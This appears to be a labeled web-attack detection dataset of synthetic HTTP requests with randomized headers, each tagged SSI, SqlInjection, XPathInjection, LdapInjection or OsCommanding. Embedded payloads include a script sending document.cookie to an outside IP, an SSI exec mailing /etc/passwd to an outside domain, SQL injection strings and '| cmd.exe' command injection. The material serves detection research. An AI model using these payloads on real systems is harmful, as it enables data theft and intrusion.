GET /psxzlNELalcn5_M/tttg2eor/ahgToikpwm/ta0u6antirwsu/b4n/edn2pxnmnumEe5tdpsm/nzgZfUOa3B4q0/dbmnRnsinta1ehrlrS.htm?edEc85aaiavbehw=%3C%21%5BCDATA%5B%3C%21--%5D%5D%3E%3Cscript+++%3E%5Bwindow.open%28%27http%3A%2F%2F61.97.134.186%2Fnsolch.dll%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript+++%3E HTTP/1.1
Host: www.5th9g.cz
Connection: srn4or
Accept: application/postscript;q=0.8
Accept-Charset: windows-874
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.4
Cache-Control: no-store
Cookie2: $Version="4"
Date: Thu, 25 Jan 07 22:22:00 UTC
ETag: W/"VEmXtl7s15oFGnIxna"
Expect: 100-continue
From: etoe9@uoeb.st
If-Unmodified-Since: Wed, 29 Aug 07 03:27:19 CET
If-Match: "H1RdAYLo-D@-p5FgUF_B"
If-None-Match: *
If-Range: Fri, 16 Jan 09 17:29:27 UTC
Max-Forwards: 6074
MIME-Version: 8.3
Pragma: Iptahe='erhtjei'
Authorization: Basic b0huaHE0bzpxZ2VlYWU=
Referer: http://2rteu.cz/taoia.css
TE: trailers,deflate;q=0.1
Trailer: If-Modified-Since
User-Agent: Mozilla/8.0 (Windows; U; WinNT 2.9; dN-ss; rv:1.0.5) Gecko/20872864
UA-Disp: 187,5451,16
UA-Color: color8
Via: lt9/3.4 180.217.34.42, 7.9 www.TlellTu.shtml:759, 5.4 37.182.103.61
Transfer-Encoding: gzip
Warning: 475 102.30.177.38 "vrpNbaaNaa2ir" "Mon, 08 Dec 08 15:45:59 UTC"
----: -----------

null

End - Id: 48150
Start - Id: 39885
class: SSI
GET /keaeatfnaced6/.winntGLmtWexec2t/hXbmvK5_b/jeoEeieoNllljtoi/wvpaW-7_y/tmKFAPPnX/og43W8rb/eqeURF1..htm?yeEtw6ihvAtt=4776&tooo83pco1simq=Loa&rnatk=e%29l+&kholp=+m5&iisacnvtdirmitl=rt&PqmochaWuXr=7645447&sT7n0AbU=41033738&Buz8TKtYuwr=dat+9iesa%3CntsaA&ae9epR5mh9eugaA=Vat&dtoeCfithdit=20416739 HTTP/1.1
Host: 238.51.207.226
Connection: close
Accept: */*
Accept-Charset: x-mac-japanese;q=0.8, windows-1254;q=0.8, windows-874, x-mac-arabic;q=0.0, iso-8859-4
Accept-Encoding: gzip
Accept-Language: ptn-tirdnag;q=0.2
Cache-Control: max-stale
Client-ip: 190.48.45.60
Cookie: zlhmemvsn=4784840;db9eileSrtsdNr=T|idineNieYn;tgooei=<!--     #exec     cmd="/bin/mail 2rne.com <   /etc/passwd"-->
Cookie2: $Version="8"
Date: Sun, 24 Jul 05 06:50:08 UTC
ETag: W/"i84vEI5jLCJw4wnxu0qy"
Expect: h6jta83
From: nLbcjwh1@egond.st
If-Modified-Since: Wed, 29 Dec 04 21:51:44 GMT
If-Unmodified-Since: Sun, 04 Nov 07 09:29:12 CET
If-Match: *
If-None-Match: "yNmdiOFCQ2WZmByC"
If-Range: *
Max-Forwards: 267
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: htAfoe Nnews=uqske3p
Authorization: NTLM aXNydGVyaW5VMG10dFRPcmhkZTl0cmhlZXRveGxvZHNkaWx0bA==
Range: -8,914957-7949,1729-07
Referer: /5akdr.asmx
TE: chunked,trailers
Trailer: Proxy-Authorization
User-Agent: Eadoe9aieqrtweria1l
UA-OS: Solaris
Via: HTTP/0.9 www.nshBdimq.gif, 2.6 www.luebS5rm.tiff
Transfer-Encoding: sewnz; iiruw9n=ilhoth
Warning: 521 25.117.247.10 "eele" 
X-Forwarded-For: 159.138.226.2
X-Serial-Number: 54810221590
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39885
Start - Id: 40978
class: SqlInjection
GET /2inputd9@/iJq4rtoeCp/o1.1NcsxwNOLJG8/6vHhfQDjauCbS7/oda/dxh/i-f_nrk1yklQ/Be@n71EMpona/Joudsscript1h4Eyixterm/kc@f81zgFYg.cgi?Oz0ss=ntbKa0t&ka=xW_8g&sceuhNtnno8=360362209&wiToe=x0u%40+r&Bfnetcat0Luel=02&eethssi4eem=9213013&e4eoeLsscmeac=%7Ceopte HTTP/1.1
Host: www.nAdvuLbRnD.biz
Connection: close
Accept: */*;q=0.2
Accept-Encoding: *
Accept-Language: 1ny-A;q=0.0, 1hf8-tuvca1;q=0.5, Msitt-STs
Cache-Control: max-age=0172
Cookie: odeecEhn=rADANMjTgDi
Cookie2: $Version="41"
Date: Fri, 20 Nov 09 24:38:43 GMT
ETag: W/"wBEzsMaG3.ujyxRSQ39"
If-Modified-Since: Mon, 04 Oct 04 22:37:20 GMT
If-Range: "97RiCTBi2S.ZQljldbeE"
Max-Forwards: 02
Referer: http://www.weiwso6.com/tasa3pk2/72trllt/eoew/jtsdsEer/bcau.mdb
TE: gzip;q=0.1,deflate,trailers
Trailer: Range
User-Agent: ';     EXEC master.dbo.sp_makewebtask  'c:\inetpub\wwwroot\7anese.html',     'SELECT   5oT7ay  FROM  i3e WHERE    xtype=''U'''
UA-Pixels: 2560x185
Via: HTTP/9.9 www.1etles.jpeg
Transfer-Encoding: gzip

null

End - Id: 40978
Start - Id: 49884
class: XPathInjection
GET /esstsdiiRt5epiocsvj/lOrmnsy9jlenntag/meiBsr0rt2Ecs2e/eonaeatsnootlo5ce/v1DqXPe5IoYr/tms0dG3O/ytAle/ptRBO/1i/teu0xj_8y.jpg?peIhSwtNp1h=%28i+++%3C++count%28CYe%2Fchild%3A%3Atext%28%29%29+and+++++j+++++%3C+count%28lose4H%2Fchild%3A%3Acomment%28%29%29+and+k++++%3C++count%28ah%2Fchild%3A%3A*%29+%29&Mb=58320&kunimlnaSraesn=812673&4hKKDyl60=Mu+&j.B1xy8h-R=tr%7Es%7CDqincbe&la=mQEClu6UrgrI HTTP/1.0
Host: 180.162.232.245
Connection: MG7ea
Accept: audio/basic;q=0.5
Accept-Charset: cp-950;q=0.6, x-mac-hebrew, euc-cn;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 161.161.216.27
Cookie: tM78acsao=1635963;gowmtenwiiit8T=nZ2PT0;ida4r9av=olibha6otcri2t6a;uCorsm-FbinQJ=reRttth6h;rsoirenQIwaq2nu=elzoa
Cookie2: $Version="80"
Date: Fri, 19 Dec 08 16:03:43 CET
ETag: W/"79-wqobJXvLTgCDO1"
Expect: eIGeTy=oploiae;cire=cRuvr
From: s8can@mqtlr.fr
If-Modified-Since: Tue, 08 May 07 19:26:29 CET
If-Unmodified-Since: Wed, 06 Dec 06 06:29:44 UTC
If-Match: *
If-None-Match: "HImC579EhDlvpdI"
If-Range: Mon, 05 Apr 10 20:59:46 GMT
Max-Forwards: 868
MIME-Version: 6.4
Pragma: iiwtSd='a7cbuQrj'
Proxy-Authorization: oAo4 hnaarqm=nniOb
Authorization: Digest realm
Range: -997,889715-,62803-
Referer: /eu0asop/5ttg/seao/mij1.wmn
TE: trailers,trailers,deflate;q=0.4
Trailer: Connection
User-Agent: Mozilla/4.8 (compatible; MSIE 0.7; WinNT; e1erus; gTaaAs7rL; 33Ests)
UA-CPU: StrongARM
UA-Disp: 2831,824,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5492x304
Via: HTTP/1.6 137.106.141.159:699
Transfer-Encoding: identity
Upgrade: Ez33h8/8.9, Odopt/6.7, aym/2.3, ttuho/1.9
Warning: 795 www.cmshn.tiff:1 "yslieeph7eoEbmyPt" "Wed, 09 Mar 05 02:21:36 GMT"
X-Forwarded-For: 88.207.99.219
X-Serial-Number: 87544886060
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49884
Start - Id: 37262
class: LdapInjection
GET /s0EJ/tma3dEfHaz6p/aJ592Yl8tuap7M7/e04yXqca/Tir/lsNBnwOQb0mA9E4V/vv/oa3x.lvbDj/eLqva2FIIQH.l1/coy.html?52uXa2.=66602&pygznqn=eD1e%29%28++++%7C+%28hnl%3D*%29&em33t=595632 HTTP/1.1
Host: www.ntnkimd.org:95
Connection: close
Accept: */*
Accept-Charset: cp-950, cp-932, utf-7, iso-10646-ucs-2;q=0.1, euc-kr
Accept-Encoding: gzip;q=0.3, compress;q=0.4, deflate;q=0.1, gzip, gzip;q=0.8
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 33.58.126.148
Cookie: bogdct=aRr-Q7;shtmSarrks=atw c\e8noh7
Cookie2: $Version="99"
Date: Sun, 01 Jan 06 17:05:29 CET
ETag: W/"bNc0uNmABEHOP3zCY98w"
Expect: 100-continue
From: tlclo@pOIec.be
If-Modified-Since: Thu, 07 Oct 04 12:39:52 CET
If-Unmodified-Since: Mon, 30 Oct 06 23:51:08 CET
If-Match: *
If-None-Match: "iIRmCLKqu4.t8i5"
If-Range: *
Max-Forwards: 850
MIME-Version: 9.7
Pragma: r9bSoi='r'
Proxy-Authorization: oetuts 0iernty=iio4tep
Authorization: Digest opaque="Onooem"
Range: 66998-,06384-073,7-
Referer: /9Cetsau.jpg
TE: gzip;q=0.6,chunked;q=0.1,chunked;q=0.4
Trailer: Expect
User-Agent: hw0RLWa http://www.hietct3.gov
UA-CPU: 68000
UA-Disp: 785,4501,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 1371x144
Via: FTP/8.4 116.93.217.116
Transfer-Encoding: identity
Upgrade: 2srsc/7.4
Warning: 942 43.44.236.191:46 "btf9mwO" "Mon, 04 Sep 06 14:47:25 CET"
X-Serial-Number: 4915309492060646563
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 37262
Start - Id: 42907
class: OsCommanding
PUT /rnetideiyaieodh/2ll7jQg4Dd1/stTyh/sm2pmM/YhJhB/e@BOb_zWUM/ahTDdz0g55w2t6Tm/xlx/5i66iwz/2KkLY@mA4.png? HTTP/1.0
Content-Length: 60
Content-Language: 3teahle
Content-Encoding: identity
Content-Location: /wfuo/33aOc8t/shlsasul.avi
Content-MD5: YWVuaGVlcGhhc3JuYXVlOQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sat, 16 Oct 04 05:26:19 UTC
Host: www.cdraldeoj.biz
Connection: keep-alive
Accept: audio/*, video/*;q=0.5
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: ttpnys='jjAu2ahd'
Cookie2: $Version="59"
Date: Thu, 04 Mar 04 08:46:09 UTC
ETag: "e7r31Qlm79vnn8aLODAZ"
Expect: 100-continue
From: siah@aeeuttHi0.net
If-Modified-Since: Wed, 08 Jun 05 04:44:10 CET
If-Unmodified-Since: Sat, 12 Nov 05 04:36:24 CET
If-Match: *
Max-Forwards: 691
MIME-Version: 0.2
Pragma: dinsis='0t'
Proxy-Authorization: NTLM TWF0Zm9yb2Z3ZWVocmgwQ2VhbnJPc3UwaUJpdE9FZWVubGVnN29vYWlpbnRn
Authorization: Digest nc=C494d1ce
Referer: /Rshqilw/eurxe5ag/lr8fho/ebss/syaEhlf.php3
TE: gzip;q=0.5,chunked;q=0.9
User-Agent: 77.204.138.142   | cmd.exe /s
UA-Disp: 4611,5463,8
UA-OS: Mac OS X
Via: 1.9 www.ahttaee.css, HTTP/8.1 www.vEhrgN.htm, 9.3 120.93.121.231
Transfer-Encoding: pnr5r; sueor=snhidmk
Upgrade: ouec/7.9, hAm/6.6, 8uT/8.5, zve/2.3
X-Serial-Number: 5451498
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hdihcTue=713122362&hdcmr4e5eattH=76198&bgsoundjv0Mmetaq=auoe

End - Id: 42907
Start - Id: 35425
class: SqlInjection
GET /metarj6nny@/couiG/gtA6rfnrke/zRQ/adnhlnorgi/A1ZOZmSon/f8eDeeSq/a8eslq4gmt/sieoyups0E/ettriewEnfitiaae/C0dZBdivCIllrzkZ/KJQc6nOC_m_.shtml?Aoju=%27+++++OR+++++%27ye%27+++++%3D++++N%27++++&esolnemqkeross=vQdX2biY&na=ao%3F2from&5seeqo=94&ndbAiru6es=wp&Funne=opVXBaOB.rT&talrNegtt4me=29948804&eszair=gn&lcthth9T=3st&seWane=a9Pld4F4m&athnrllaj=rwn HTTP/1.1
Host: 241.20.72.149:80
Connection: close
Accept: video/quicktime;q=0.9
Accept-Charset: *
Accept-Encoding: compress, gzip, deflate;q=0.1
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 185.9.17.112
Cookie: eleenitbg=ue
Date: Sat, 06 Nov 04 08:10:28 UTC
ETag: "xs@3tPvr8T.jKwZ7M6C"
Expect: edzd=keea
If-Modified-Since: Tue, 03 Jun 08 13:02:12 CET
If-Unmodified-Since: Wed, 14 Jan 09 04:44:55 CET
If-Match: "D2IWcd4pDLsjIT9g8"
If-None-Match: "6414UPycTaOr9QTdR"
If-Range: "r@1bfIIiOX1_k1qKLf"
Max-Forwards: 4331
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM ZXZ4dGNlbnBkYXNmZXV2dG1vdEw5aXlkdG52VGdPdEVlbXQ0
Authorization: Digest opaque="nmlaq"
Referer: http://rRnimknn.uk/Ee8gogd/useonI/ehihewr/cehlR.php
Trailer: TE
User-Agent: Mozilla/0.2 (compatible; ogitx; Win 9x; eCh2neahne)
UA-OS: Linux
UA-Pixels: 4231x7309
Via: 2.3 www.peta.shtml
Transfer-Encoding: ve4tr
Upgrade: a1uoii/9.3, 2Nnr06/6.4
Warning: 213 www.ha181.png "anao" "Fri, 28 Dec 07 24:10:22 UTC"
X-Forwarded-For: 115.143.230.10
X-Serial-Number: 323144017545
----: --------------------------------------------------

null

End - Id: 35425
Start - Id: 43235
class: OsCommanding
GET /optRE1e/AshutdownlFCM6kH/gq/ureplaceg.tiff?unph-o6wOfMnopenRu=37062403&ewlfoliicm=e%3Eyk&Rwb8ltE3l9lm=08507&aoIrat8otleea=lqeqbodyrlocationdrxatw%40netcattd&eo=nvmiyin2hCmhod&ute9ums7ehhs=%28ip%25eep+o+hp+%5B%2Bu&scnii=8sd2atIl&tcoi7ilaanSe2l=%7C+++id+++%7C&styleC1OwHPTrcp=Uterhseruadnt&sitii8exwdfda=c2y HTTP/1.0
Host: www.iuatglS.biz:2670
Connection: ayeiah
Accept: image/*;q=0.2, image/jpeg, audio/*;q=0.0
Accept-Charset: iso-10646-ucs-2, x-mac-korean, windows-1255
Accept-Encoding: deflate;q=0.4, gzip
Accept-Language: *
Cache-Control: dtuh2th=n5shts
Client-ip: 36.211.14.62
Cookie: netefh=tedsele;AEPQZ3a7b4SH=ogDfaAWX@;cmN9nlannohrr=e>;uih1nte=sa 3f06nm >ro pL\apositioninsert;j3o=417608;ooqax2r15llife=rd3ledpm\tn
Cookie2: $Version="3"
Date: Thu, 20 Dec 07 04:38:55 GMT
ETag: "h9OlCFyb@HUr6enBM"
Expect: e87y4=Iztt;eiaz=serwoe
From: Odth@g78cnm.uk
If-Modified-Since: Thu, 02 Aug 07 16:28:04 GMT
If-Unmodified-Since: Fri, 25 Jan 08 13:13:46 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 14 Sep 07 08:34:25 CET
Max-Forwards: 2
MIME-Version: 4.4
Pragma: t1=pnthant
Proxy-Authorization: Digest uri=/abtstebu/h4felsd/o370lht/etxsert/rdgGE.asp
Authorization: Basic ZWVyM0U6cmF0dXNl
Range: -330,06836-
Referer: /sogeaw/n4onau.aspx
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/2.4 (compatible; tlttg2hrt; Linux i386; wsa0d0P)
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: 0.1 225.142.131.138
Transfer-Encoding: gzip
Upgrade: nbUlro/5.5, yfi/5.9, islxmt/9.6, tmL/9.7
Warning: 473 www.sStrCzh.js "hicttlor5tflF" 
X-Forwarded-For: 173.145.188.232
X-Serial-Number: 3809752703652
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43235
Start - Id: 35511
class: XPathInjection
GET /eo9sDvloCittd/QAVUTjeUyf7rfrom/ilxs1i/aRa/elt/eqise3ttmf.shtml?laaEpecbnferrn=0143433&Z6bFahaB7.=435433&rreou=ueagttckaeye1yoEsE&cegy51esolTi=seseloiuyste HTTP/1.1
Host: 171.185.160.226:80
Connection: close
Accept: application/*;q=0.7, video/quicktime
Accept-Charset: *;q=0.3
Accept-Encoding: identity, compress;q=0.6, compress, deflate;q=0.8, gzip;q=0.5
Accept-Language: *
Cache-Control: no-transform
Client-ip: 104.88.89.200
Cookie: jdrO=cet' or    1<    ghspg4/ctti/Eamaas/child::text()[position()=9]  or    'ywnAteei' =    '
Date: Mon, 26 Jun 06 02:58:22 UTC
ETag: W/"uQ3Rz.Tdnu2C-mWo2PM"
Expect: mstesng=gcitlo;roecvi
If-Modified-Since: Thu, 29 Jun 06 05:54:35 GMT
If-None-Match: "xX@@MmqkvbwaZrH_v"
If-Range: "7ND5DpoXtbiBpFa"
Max-Forwards: 464
Pragma: 3b=eorCe
Proxy-Authorization: n0rn nth4d1o=ahwxs2ss
Authorization: NTLM U2h1Y3h1ZjJjaHNuaEVlbmZpMklyYW42c3NtYW9kZm5obw==
Range: 772-390777,620-39,-266
Referer: /GqEegs6/scta.jsp
User-Agent: Mozilla/7.5 (X11; U; Unix 4.8; oe-v0; rv:6.1.6) Gecko/19449562
Via: aolh/6.2 www.rselbwld.tiff:1, nscm/3.1 186.169.20.168
Transfer-Encoding: deflate
Upgrade: 8idTn/3.6, s4ed/3.5, mpa/4.3
Warning: 842 57.136.4.51:65449 "htvyCt7wa0eeaogat9" 
X-Serial-Number: 210520272316411

null

End - Id: 35511
Start - Id: 41556
class: SqlInjection
GET /p_rUIH/ryUBX9/GZAYhtpassr/cdpa11hs/tfshtsoiemeobtt/fUMjK1pg5.jpg?axNtelsose=20376&tgilpmdleqiw=%3B++++EXEC%28%27UNI%27%2B%27ON%27%2B%27++%27%2B%27SEL%27%2B%27ECT+++++++%27piydd%27%2C7232%2C0342%2C%27eH6ene%27%2C9+FROM+aasToosezw%29&bNCwg=aUtx&t2eaSSssaaae=cQa&zt8nL8epz=mlpr HTTP/1.1
Host: www.ous5hc.com:80
Connection: coEtm3v
Accept: image/jpeg
Accept-Charset: *
Accept-Encoding: gzip, gzip, gzip;q=0.7, gzip
Accept-Language: e9O-e6n, otseXito-kwo;q=0.8
Cache-Control: min-fresh=009
Cookie: 81t0munae=rha
Cookie2: $Version="9"
Date: Wed, 03 Oct 07 10:54:43 UTC
Expect: vnri
From: esfthi@adoaa.it
If-Modified-Since: Wed, 11 Aug 04 09:30:16 CET
If-Match: "FygmEZWjRtgXz2-"
If-None-Match: *
If-Range: Wed, 18 Oct 06 20:51:30 GMT
Max-Forwards: 425
MIME-Version: 4.7
Pragma: qmen=s
Proxy-Authorization: NTLM ZWVpdXM4bnZlckFpYW5tMXRoY3JicjJwZEd0TG91bnlBV2F4dXM=
Authorization: Basic VDBkZTphbzNUaGM=
Range: 4-728143
Referer: /rasD/eceR/a6scn0cS/ct3thwrR.asmx
TE: gzip,deflate
Trailer: Accept-Language
User-Agent: vjNnta3vjgSiitr
UA-OS: Win95
UA-Pixels: 9596x5714
Via: owe9n/7.7 www.iaeatwci.htm
Transfer-Encoding: compress
Upgrade: oeheiX/0.1
Warning: 924 www.tl2tn2r.tiff:1735 "i0edcChnth5mercmaxie" "Sat, 07 Feb 09 03:06:52 CET"
X-Forwarded-For: 166.15.230.232
----: --------------------------------

null

End - Id: 41556
Start - Id: 38238
class: LdapInjection
GET /menldIoiwraeaq3Ebseu/qe/iaenorgrd0iheWHac/tKz0-anGw/ncOR8tb8hmyXsPRT/mWwfPKH9v0uSRr_/eEI27u/qif/ueUerhjGcsFtetxpuotn.shtml?0rcHtoeimo=651%29%28%26%28objectClass%3Dlth%29%28%7C%28sn++++%3D++++u0i%29%28cn%3Dmo+++++J*%29%29&kIcse5=%3F%40eboot.inibreua%25%3Ai HTTP/1.0
Host: www.lahnase.de:1355
Connection: luearc61
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: nr-xdmnmq8, etd-x9e;q=0.7, a-Sfy;q=0.3, ee-n9pzin;q=0.4
Cache-Control: no-store
Client-ip: 132.120.171.48
Cookie: 1teoh6=874494;stuPmwst71h=n)7liket
Cookie2: $Version="43"
Date: Sat, 09 Jun 07 01:42:01 GMT
ETag: W/"4bKLWIf8NoM0jqgX"
Expect: lereii
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Wed, 05 Aug 09 02:04:33 CET
If-Unmodified-Since: Fri, 11 Jan 08 08:23:32 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6973
MIME-Version: 3.3
Pragma: eertnoe=iur
Proxy-Authorization: NTLM a1BkdXRhbmhpcnJpYm5hU3RpZW5UY0RhdDhlc3NsQ3NtY2Vwbkli
Authorization: Basic dGVhNmVlbjp6T21ucw==
Range: -9629,18880-,-775909
Referer: /di6nfoim.js
TE: trailers,deflate
Trailer: Connection
User-Agent: Mozilla/0.5 (compatible; eese3; Solaris; cmeiAegr)
UA-CPU: StrongARM
UA-Disp: 390,422,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 835x0812
Via: HTTP/6.7 www.2Z5yeq.png:48331
Transfer-Encoding: gzip
Upgrade: eddcT/3.3, roas/0.6
Warning: 960 www.duToe.shtml "ptStgi2naAcbsign2b" "Wed, 02 Nov 05 20:39:52 UTC"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 3952858356016801
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38238
Start - Id: 41405
class: SqlInjection
POST /e1rs_T/madnwdcrmet8e7Y/delete7wtOD-h2nGFtp/a5Ew/XnXR/lmu.cDJxBeXY7ioejT/siR1KBj/KhUvarQFAr4yh1Dqg/himkuTir.shtml? HTTP/1.1
Content-Length: 304
Content-Language: gmgl60t,fntses
Content-Encoding: gzip
Content-Location: http://www.fahysa.com/tPengeuR/rnae39iU/np6sto6c.swf
Content-MD5: dGpwcG5obnJnYWxzdWVpYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Jul 07 23:12:59 GMT
Last-Modified: Fri, 06 Oct 06 13:57:12 GMT
Host: www.74ejte.com
Connection: keep-alive
Accept: audio/x-wav;q=0.0, application/*;q=0.0, application/x-tar;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: sd5fyH-e5to, m-ot
Cache-Control: max-stale=56020
Client-ip: 87.5.203.76
Cookie: n0=7597;idt39Xks='ta;na=82;btisaytrk0cH=27711540;rfThihr=Oetrasleax
Cookie2: $Version="59"
Date: Sat, 21 Nov 09 16:17:00 CET
ETag: "rHeFjrsZGZRJDQJiVfX"
Expect: jeuN
From: xttrniQd@tSeAtnO.net
If-Modified-Since: Sun, 18 May 08 09:14:33 CET
If-Unmodified-Since: Sat, 18 Mar 06 18:45:56 CET
If-Match: "SBsCTqXFyrKc5bKe6G5"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: cTtsb nlsttnre=nmx5nae7
Range: 24-
Referer: /a6oing/scee.asp
TE: trailers,trailers,gzip
Trailer: If-None-Match
User-Agent: Mozilla/8.6 (Machintosh; U; PPC 2.8; el-pl; rv:7.7.9) Gecko/41807224
UA-CPU: StrongARM
UA-Disp: 0223,7526,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1178x5140
Via: HTTP/8.8 78.35.243.148
Transfer-Encoding: identity
Upgrade: etntne/4.1, Iossd/8.2
Warning: 643 191.194.177.159 "m5pnsfytke" "Thu, 04 Dec 08 02:42:59 GMT"
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 15055892627895380
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dyha6icF3rao7=6633&hcmdee5vse=upEdyhyicr @Ieval'&ihben5d= s>ee@scriptorlsn+&UYdnetcat=774559334&rbobgm=' OR  'AoiaSgdex'   =   '   &nGwthjo=9sslibbmailI du&asO=hytphpayd)s eo &RCFdzh=tdc&nh=bw|wt&mweictornao=2g:iopenadhavingl tcatrbgsound'ti?o&uwxh=seZehmeajo&s2&atet=eose

End - Id: 41405
Start - Id: 37180
class: LdapInjection
GET /hpydWqlZU/cfw3bwnergneri/yu7WaMneyrlc0tmodnmt.css?AmtstadqaaAa=%29++%28++++%7C+%28kne%3Dnam*%29&IFszM=36&dtil5aty=d%2Fuu%3E%3Ceeoth%3Bu%5Cf HTTP/1.1
Host: www.thsme9.cz:63629
Connection: 7sni99
Accept: */*;q=0.8
Accept-Charset: windows-1257;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: min-fresh=7
Client-ip: 105.61.31.124
Cookie: itHDspcrdafb=zsl
Cookie2: $Version="6"
Date: Thu, 12 Jul 07 01:20:47 UTC
ETag: "cmhDI5J8iYPu8ZT-g7OW"
Expect: qciaK=laucnwfa
From: aheoexc5@cnna.gov
If-Modified-Since: Sat, 25 Aug 07 12:13:10 UTC
If-Unmodified-Since: Sat, 03 Dec 05 08:39:22 GMT
If-Match: *
If-None-Match: *
If-Range: "Z4G3T@eRECE7Qfy"
Max-Forwards: 77
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Digest username="fttllaoe"
Authorization: Basic d2FabDpUZWh0YmY=
Range: 0-
Referer: http://www.hdeo.de/Atsewyoa/pisc0ns.php
TE: trailers
Trailer: Max-Forwards
User-Agent: aori/2.0.1.8
UA-CPU: 68000
UA-Disp: 303,353,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5392x195
Via: rcv/4.7 64.167.15.50, HTTP/5.3 98.211.220.205, FTP/9.3 www.tteb.shtml
Transfer-Encoding: deflate
Upgrade: vtLqpc/5.6, rwtot/2.1, ahfxu/1.7, se1/6.7
Warning: 419 www.oe4ei.jpeg "oeecaegei0asnitnozib" 
X-Forwarded-For: 194.226.246.19
X-Serial-Number: 175208593
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37180
Start - Id: 42739
class: SqlInjection
PUT /Oeas/sj0Dcr4/sf2t/aizAjE2pq7Pl/strenFthrabH/oPM/7geFG/soacsaM59seoieu4e8s.html? HTTP/1.1
Content-Length: 243
Content-Language: nitdd9
Content-Encoding: identity
Content-Location: /Htst/a7sif.mdb
Content-MD5: RXMzb25lbjl1OWxwaHNIRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 24 Aug 08 03:13:43 CET
Last-Modified: Fri, 09 May 08 16:26:01 CET
Host: 148.111.115.142
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-turkish, euc-kr, iso-8859-4;q=0.5, iso-8859-1;q=0.9, koi8;q=0.4
Accept-Encoding: gzip, deflate, deflate;q=0.5, gzip, gzip
Accept-Language: sa0-t;q=0.6
Cache-Control: max-stale
Client-ip: 14.26.245.53
Cookie: sssbuq=OrigText'OR'tSA' =  'ietinnotd'
Cookie2: $Version="108"
Date: Fri, 09 Jul 04 09:12:52 GMT
ETag: "3spb4TK2EuEY@0A"
Expect: esschl5x=6ResY
From: rlte@rs4T41y.it
If-Modified-Since: Sun, 06 Mar 05 12:26:05 GMT
If-Unmodified-Since: Fri, 01 Jun 07 07:41:41 UTC
If-Match: *
If-None-Match: "LqIwakH4phFYcNfHD"
If-Range: "aUuBkNFWQB9EK9bwv"
Max-Forwards: 8634
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM cmxlZWxhYWFlZGllc3RuZ2hOVEV0SW9zb2VuaTBlM3NvaQ==
Authorization: Basic U3N0cnNpOnBzdGJz
Range: 48614-31991
Referer: http://nloa.ch/ehknia/4Tme/ilnt.msf
TE: trailers,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: iria0/3.3
UA-CPU: MIPS
UA-Disp: 6479,305,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 957x8790
Via: 9.1 196.208.64.144:51063
Transfer-Encoding: identity
Upgrade: usuiD/4.0, 7hqfn/1.3, ua0l/0.7, ndst/6.3
Warning: 055 www.uztrr9on.js "pnHydeIeedjteb3" 
X-Forwarded-For: 235.103.6.212
X-Serial-Number: 40137446111101
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aost1paw=s]ahtaccesCiperaeal|itr/&cRrteet1t=67808171&0bCExaA=awoEtnltttadnM&gceceeinki=h|ohw7l&sTCufkp1l=4 rnL&-HdrophFwinntwcs3UB=5irhttp&itprr=7177&cct3aeugea=c|t89&ecec=596633&neesnlkxtozrslb=ai&mEoaer5Cia1rm=08371&Wrki3ahH=r>wu

End - Id: 42739
Start - Id: 36282
class: PathTransversal
